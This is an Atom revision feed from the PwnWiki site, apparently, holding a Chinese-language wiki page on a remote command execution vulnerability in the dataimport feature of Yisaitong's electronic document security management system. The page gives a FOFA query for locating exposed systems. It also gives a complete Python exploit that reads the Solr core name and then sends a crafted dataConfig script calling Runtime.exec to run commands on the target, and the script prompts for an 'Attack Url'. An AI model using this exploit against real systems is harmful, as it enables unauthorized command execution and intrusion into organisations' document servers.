<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E5%84%84%E8%B3%BD%E9%80%9A_%E9%9B%BB%E5%AD%90%E6%96%87%E6%AA%94%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%B5%B1_dataimport_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>億賽通 電子文檔安全管理系統 dataimport 遠程命令執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E5%84%84%E8%B3%BD%E9%80%9A_%E9%9B%BB%E5%AD%90%E6%96%87%E6%AA%94%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%B5%B1_dataimport_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E5%84%84%E8%B3%BD%E9%80%9A_%E9%9B%BB%E5%AD%90%E6%96%87%E6%AA%94%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%B5%B1_dataimport_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-16T03:24:22Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E5%84%84%E8%B3%BD%E9%80%9A_%E9%9B%BB%E5%AD%90%E6%96%87%E6%AA%94%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%B5%B1_dataimport_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=3900&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==FOFA== &lt;pre&gt; title=&quot;电子文档安全管理系统&quot; &lt;/pre&gt;  ==漏洞利用== 先獲取 core name  訪問路徑 &lt;pre&gt; /solr/admin/cores &lt;/pre&gt;  ==POC== &lt;pre&gt; import requests...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E5%84%84%E8%B3%BD%E9%80%9A_%E9%9B%BB%E5%AD%90%E6%96%87%E6%AA%94%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%B5%B1_dataimport_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=3900&amp;oldid=prev"/>
		<updated>2021-06-03T02:47:21Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==FOFA== &amp;lt;pre&amp;gt; title=&amp;quot;电子文档安全管理系统&amp;quot; &amp;lt;/pre&amp;gt;  ==漏洞利用== 先獲取 core name  訪問路徑 &amp;lt;pre&amp;gt; /solr/admin/cores &amp;lt;/pre&amp;gt;  ==POC== &amp;lt;pre&amp;gt; import requests...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==FOFA==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
title=&amp;quot;电子文档安全管理系统&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==漏洞利用==&lt;br /&gt;
先獲取 core name&lt;br /&gt;
&lt;br /&gt;
訪問路徑&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/solr/admin/cores&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import requests&lt;br /&gt;
import sys&lt;br /&gt;
import random&lt;br /&gt;
import re&lt;br /&gt;
import base64&lt;br /&gt;
import time&lt;br /&gt;
from requests.packages.urllib3.exceptions import InsecureRequestWarning&lt;br /&gt;
&lt;br /&gt;
def title():&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')&lt;br /&gt;
    print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')&lt;br /&gt;
    print('+  \033[34m公众号  : PeiQi文库                                                   \033[0m')&lt;br /&gt;
    print('+  \033[34mTitle  : 亿赛通 电子文档安全管理系统 dataimport 远程命令执行漏洞            \033[0m')&lt;br /&gt;
    print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')&lt;br /&gt;
    print('+  \033[36mUrl         &amp;gt;&amp;gt;&amp;gt; http://xxx.xxx.xxx.xxx                             \033[0m')&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
&lt;br /&gt;
def POC_1(target_url):&lt;br /&gt;
    vuln_url = target_url + &amp;quot;/solr/admin/cores&amp;quot;&lt;br /&gt;
    headers = {&lt;br /&gt;
        &amp;quot;Content-Type&amp;quot;: &amp;quot;application/x-www-form-urlencoded&amp;quot;,&lt;br /&gt;
    }&lt;br /&gt;
    try:&lt;br /&gt;
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)&lt;br /&gt;
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)&lt;br /&gt;
        print(&amp;quot;\033[36m[o] 正在请求 {}/solr/admin/cores.... \033[0m&amp;quot;.format(target_url))&lt;br /&gt;
        if 'responseHeader' in response.text and response.status_code == 200:&lt;br /&gt;
            result = re.search(&lt;br /&gt;
                r'&amp;lt;str name=&amp;quot;name&amp;quot;&amp;gt;([\s\S]*?)&amp;lt;/str&amp;gt;&amp;lt;str name=&amp;quot;instanceDir&amp;quot;&amp;gt;', response.text, re.I)&lt;br /&gt;
            core_name = result.group(1)&lt;br /&gt;
            print(&amp;quot;\033[36m[o] 获取core_name : {} \033[0m&amp;quot;.format(core_name))&lt;br /&gt;
            POC_2(target_url, core_name)&lt;br /&gt;
        else:&lt;br /&gt;
            print(&amp;quot;\033[31m[x] 请求失败 \033[0m&amp;quot;)&lt;br /&gt;
            sys.exit(0)&lt;br /&gt;
&lt;br /&gt;
    except Exception as e:&lt;br /&gt;
        print(&amp;quot;\033[31m[x] 请求失败 \033[0m&amp;quot;, e)&lt;br /&gt;
&lt;br /&gt;
def POC_2(target_url, core_name):&lt;br /&gt;
    cmd = &amp;quot;whoami&amp;quot;&lt;br /&gt;
    vuln_url = target_url + &amp;quot;/solr/{}/dataimport?command=full-import&amp;amp;verbose=false&amp;amp;clean=false&amp;amp;commit=false&amp;amp;debug=true&amp;amp;core=tika&amp;amp;name=dataimport&amp;amp;dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22{}%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20&amp;quot;.format(core_name, cmd)&lt;br /&gt;
    files = {&lt;br /&gt;
        'stream.body': '''&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
        &amp;lt;RDF&amp;gt;&lt;br /&gt;
        &amp;lt;item/&amp;gt;&lt;br /&gt;
        &amp;lt;/RDF&amp;gt;'''&lt;br /&gt;
    }&lt;br /&gt;
    try:&lt;br /&gt;
        print(&amp;quot;\033[36m[o] 正在执行 whoami ... \033[0m&amp;quot;.format(target_url))&lt;br /&gt;
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)&lt;br /&gt;
        response = requests.post(url=vuln_url, files=files, verify=False, timeout=5)&lt;br /&gt;
        cmd_response = re.search(&lt;br /&gt;
                r'documents&amp;quot;&amp;gt;&amp;lt;lst&amp;gt;&amp;lt;arr name=&amp;quot;title&amp;quot;&amp;gt;&amp;lt;str&amp;gt;([\s\S]*?)&amp;lt;/str&amp;gt;&amp;lt;/arr&amp;gt;&amp;lt;/lst&amp;gt;', response.text, re.I)&lt;br /&gt;
        cmd_response = cmd_response.group(1)&lt;br /&gt;
        if response.status_code == 200 and cmd_response:&lt;br /&gt;
            print(&amp;quot;\033[36m[o] 命令响应为:\n{} \033[0m&amp;quot;.format(cmd_response))&lt;br /&gt;
&lt;br /&gt;
    except Exception as e:&lt;br /&gt;
        print(&amp;quot;\033[31m[x] 请求失败 \033[0m&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
if __name__ == '__main__':&lt;br /&gt;
    title()&lt;br /&gt;
    target_url = str(input(&amp;quot;\033[35mPlease input Attack Url\nUrl &amp;gt;&amp;gt;&amp;gt; \033[0m&amp;quot;))&lt;br /&gt;
    POC_1(target_url)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==參考==&lt;br /&gt;
https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E4%BA%BF%E8%B5%9B%E9%80%9A/%E4%BA%BF%E8%B5%9B%E9%80%9A%20%E7%94%B5%E5%AD%90%E6%96%87%E6%A1%A3%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20dataimport%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>